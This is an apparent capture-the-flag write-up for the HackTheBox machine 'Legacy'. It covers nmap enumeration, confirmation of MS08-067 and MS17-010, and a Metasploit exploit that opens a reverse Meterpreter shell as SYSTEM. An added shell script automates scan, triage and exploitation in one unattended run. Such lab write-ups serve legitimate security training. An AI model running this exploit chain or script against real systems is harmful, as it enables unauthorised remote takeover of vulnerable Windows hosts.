[HTB] Legacy

Today we are going to hack the HTB machine called Legacy. It is rated easy.

Enumeration



sml@m0nikE:~/ctf/htb/machines/legacy$ sudo nmap -A -p- -sS 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 16:59 CET
Nmap scan report for 10.10.10.4
Host is up (0.038s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows 2003 SP2 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (90%), Microsoft Windows XP SP2 (89%), Microsoft Windows Server 2003 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h57m34s, deviation: 1h24m50s, median: 4d23h57m34s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:5d:9b (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-11-29T19:58:39+02:00
| smb-security-mode: 
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   38.38 ms 10.10.14.1
2   38.46 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.95 seconds

Only 139 and 445 are open (3389 is closed and the other 65532 ports are filtered), the SMB scripts fingerprint the host as Windows XP in the HTB workgroup, and SMB message signing is disabled. Two details worth keeping in mind: the box's clock is about five days ahead of ours (the scan ran on 2019-11-24 while the host reports 2019-11-29), which explains the file timestamps later on; and the failed SMB2 negotiation is consistent with an SMBv1-only server. With 445 open, let's check it for known vulnerabilities with the nmap smb-vuln* scripts.

sml@m0nikE:~$ sudo nmap -sS --script smb-vuln* -p445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-24 17:02 CET
Nmap scan report for 10.10.10.4
Host is up (0.038s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.73 seconds

Both MS08-067 (CVE-2008-4250, a stack overflow in the Server service's path canonicalization, reachable over RPC without credentials) and MS17-010 (CVE-2017-0143, SMBv1) come back as VULNERABLE, so either one gives remote code execution. We'll use MS08-067 here. One caveat before firing it: the exploit is target-specific (OS, service pack and language), and a wrong target usually crashes the Server service instead of returning a shell, so let the Metasploit module fingerprint the host rather than forcing a target.

Exploitation



msf5 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.13:4444 
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.13:4444 -> 10.10.10.4:1031) at 2019-11-24 17:03:37 +0100

It worked: the module fingerprinted the host as Windows XP SP3 English on its own and we have a Meterpreter session. Let's check what privileges we have on the box.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

We are NT AUTHORITY\SYSTEM straight away: the Server service we exploited runs as LocalSystem, so there is no privilege-escalation step on this machine. Time to collect the flags; `shell` from Meterpreter gives the cmd.exe prompt used below. (The zero-byte files named 10.10.10.4, exploit, search, set, show and use in C:\Documents and Settings appear to be leftovers from other players on the shared instance, not part of the box.)
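The chain above (smb-vuln scan, reading the script output, running the Metasploit module) as one script. This is an added example, not code from the original writeup or from HTB: it assumes nmap and msfconsole are installed on the attacking box, that 10.10.14.13 is the attacker's VPN address (the one the handler bound to above), and it only touches the network when RUN_LIVE=1; the smb-vuln excerpt embedded in it is constructed from the shape of the scan above so the triage step can be run offline.

```shell
#!/bin/sh
# Added example, not code from the original writeup. Scan -> triage -> exploit
# in one unattended run. Assumptions: nmap and msfconsole on PATH, target
# 10.10.10.4, attacker VPN address 10.10.14.13. Live steps run only with
# RUN_LIVE=1; SAMPLE_SCAN below is a constructed excerpt for offline use.
set -eu

TARGET="${TARGET:-10.10.10.4}"
LHOST="${LHOST:-10.10.14.13}"   # assumed attacker address; check with: ip -4 addr show tun0

# Step 1: only the SMB vuln scripts against 445, saved with -oN so the
# evidence is kept and can be re-triaged later without rescanning.
smb_vuln_scan() {
  host="$1"; out="$2"
  sudo nmap -sS -p445 --script 'smb-vuln*' -oN "$out" "$host" >/dev/null
}

# Step 2: triage. Reads nmap normal output on stdin and prints
# "<script-id> <CVE>" for every smb-vuln script that reported
# "State: VULNERABLE". One-line results (false / ERROR) and softer
# verdicts such as "State: LIKELY VULNERABLE" are dropped on purpose:
# only a definite hit should drive step 3.
triage_smb_vulns() {
  awk '
    /^[|] smb-vuln-[a-z0-9-]+:/ {          # start of a multi-line script result
      script = $2; sub(/:$/, "", script); vuln = 0; cve = ""; next
    }
    /^[|]_smb-vuln-[a-z0-9-]+:/ { script = ""; next }   # one-line result: false/ERROR
    script != "" && /State: VULNERABLE/ { vuln = 1 }
    script != "" && /CVE:CVE-[0-9]+-[0-9]+/ {
      match($0, /CVE-[0-9]+-[0-9]+/); cve = substr($0, RSTART, RLENGTH)
    }
    script != "" && vuln && cve != "" { print script, cve; script = "" }
  '
}

# Step 3: resource script for the module used above. PAYLOAD and LHOST are
# set explicitly; the interactive run let msf pick the handler interface,
# which chooses the wrong one on a multi-homed attacker box.
msf_rc_ms08_067() {
  host="$1"; lhost="$2"
  printf '%s\n' \
    "use exploit/windows/smb/ms08_067_netapi" \
    "set RHOSTS $host" \
    "set LHOST $lhost" \
    "set PAYLOAD windows/meterpreter/reverse_tcp" \
    "exploit -z"
}

main() {
  out="legacy_smb_vuln.nmap"
  smb_vuln_scan "$TARGET" "$out"
  hits="$(triage_smb_vulns < "$out")"
  [ -n "$hits" ] || { echo "no definite smb-vuln hit on $TARGET" >&2; exit 1; }
  printf 'confirmed on %s:\n%s\n' "$TARGET" "$hits"
  if printf '%s\n' "$hits" | grep -q '^smb-vuln-ms08-067 '; then
    msf_rc_ms08_067 "$TARGET" "$LHOST" > legacy.rc
    msfconsole -q -r legacy.rc
  fi
}

# Constructed excerpt in the shape of the smb-vuln output above (offline demo only).
SAMPLE_SCAN='Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'

if [ "${RUN_LIVE:-0}" = 1 ]; then
  main
else
  printf '%s\n' "$SAMPLE_SCAN" | triage_smb_vulns
fi
```

Run it as `RUN_LIVE=1 sh legacy.sh` to go live; without the variable it only triages the embedded sample and prints the two confirmed hits. The triage step deliberately ignores `State: LIKELY VULNERABLE` and the one-line `false`/`ERROR` results (ms10-061 above errored, which is a script failure, not a clean bill of health), so that only a definite finding drives the exploit step.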

user.txt



C:\>cd documents and settings
cd documents and settings

C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings

29/11/2019  08:02                .
29/11/2019  08:02                ..
29/11/2019  08:02                  0 10.10.10.4
16/03/2017  08:07                Administrator
16/03/2017  07:29                All Users
29/11/2019  08:02                  0 exploit
16/03/2017  07:33                john
29/11/2019  08:01                  0 search
29/11/2019  08:02                  0 set
29/11/2019  08:01                  0 show
29/11/2019  08:01                  0 use
               6 File(s)              0 bytes
               5 Dir(s)   6.313.308.160 bytes free

C:\Documents and Settings>cd john
cd john

C:\Documents and Settings\john>cd Desktop
cd Desktop

C:\Documents and Settings\john\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  08:19                .
16/03/2017  08:19                ..
16/03/2017  08:19                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.313.304.064 bytes free

C:\Documents and Settings\john\Desktop>type user.txt
e69af0e4f443de7e36876fda4ec76XXX

root.txt



C:\Documents and Settings>cd Administrator
cd Administrator

C:\Documents and Settings\Administrator>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator

16/03/2017  08:07                .
16/03/2017  08:07                ..
16/03/2017  08:18                Desktop
16/03/2017  08:07                Favorites
16/03/2017  08:07                My Documents
16/03/2017  07:20                Start Menu
               0 File(s)              0 bytes
               6 Dir(s)   6.313.295.872 bytes free

C:\Documents and Settings\Administrator>cd Desktop
cd Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
993442d258b0e0ec917cae9e695d5XXX

End


And with that we have both the user flag and the root flag (masked above).